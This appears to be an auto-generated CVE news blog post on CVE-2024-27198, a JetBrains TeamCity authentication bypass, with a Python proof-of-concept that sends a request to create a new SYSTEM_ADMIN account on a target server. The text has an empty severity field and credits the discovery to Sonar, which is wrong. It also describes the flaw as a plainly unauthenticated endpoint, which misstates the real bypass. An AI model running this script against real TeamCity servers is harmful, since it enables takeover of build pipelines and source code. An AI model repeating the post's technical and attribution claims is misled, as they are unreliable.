CVE CyberSecurity Database News

CVE-2024-27198 - How a TeamCity Authentication Bypass Let Attackers Go Full Admin

Poster -

In early 2024, security researchers uncovered a major vulnerability in JetBrains TeamCity — a popular CI/CD platform used by thousands of companies to automate their build and deployment pipelines. Tracked as CVE-2024-27198, this security flaw made it possible for attackers to completely skip TeamCity’s login process, granting themselves full admin privileges.

In this post, we’ll break down what went wrong, how attackers exploited it (with code examples), the impact, and what steps you should take if you’re still running a vulnerable version before 2023.11.4.

What Is TeamCity?

If you haven’t used it: TeamCity (from JetBrains) is a tool that automates building and deploying code. It’s widely used for its ease-of-use and plugin ecosystem.

But that also makes it an attractive target for attackers — since it often connects to source code repositories, deploys builds to servers, and can access production data.

What Happened?

In versions before 2023.11.4 of TeamCity, there was a logic flaw in the authentication mechanism for some REST API endpoints. Put simply, by crafting requests in a specific way, attackers could bypass login controls and perform admin actions — like adding users, downloading project source code, or deploying malware.

Severity:

The API Flaw

Internally, TeamCity exposes REST API endpoints for automation and integration. Among these were endpoints that, due to improper handler configuration, skipped enforcing authentication under certain conditions.

Here’s a simplified proof-of-concept exploit, targeting a vulnerable TeamCity server

import requests

# Change these as needed
TEAMCITY_URL = "http://victim-teamcity:8111";
NEW_USERNAME = "haxor"
NEW_PASSWORD = "P@sswrd!"

# 1. Create a new admin user - no auth
resp = requests.post(
    f"{TEAMCITY_URL}/app/rest/users",
    headers={
        "Content-Type": "application/json",
        "Accept": "application/json"
    },
    json={
        "username": NEW_USERNAME,
        "password": NEW_PASSWORD,
        "roles": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]
    }
)

if resp.status_code == 200 or resp.status_code == 201:
    print("[+] Admin user created:", NEW_USERNAME)
else:
    print("[-] Failed, server response:", resp.text)

How does this work?
- The endpoint /app/rest/users failed to require authentication in older versions

Now, log in with the new credentials, and you’re full admin

Or, attackers could use similar API calls to dump configuration, download code, or plant malicious agents.

How Was It Found?

- First reported by security firm Sonar (original advisory: Sonar Blog Post)
- JetBrains confirmed & patched in February 2024 (JetBrains Advisory)

How to Patch

Upgrade IMMEDIATELY to TeamCity 2023.11.4 or newer. Get it here:
https://www.jetbrains.com/teamcity/download/

- JetBrains Blog: Official Advisory
- Sonar's Original Research & Full Technical Details
- NVD (National Vulnerability Database) CVE Entry

Conclusion: Why This Matters

CVE-2024-27198 is one of the worst CI/CD bugs in recent memory, and was actively scanned for within hours of public disclosure. The ease of exploitation combined with TeamCity’s access to critical infrastructure makes it a must-fix for all users. Always keep your DevOps tools updated and restrict public access — because one missed patch can lead to an organizational breach.

Timeline

Published on: 03/04/2024 18:15:09 UTC
Last modified on: 03/11/2024 15:15:47 UTC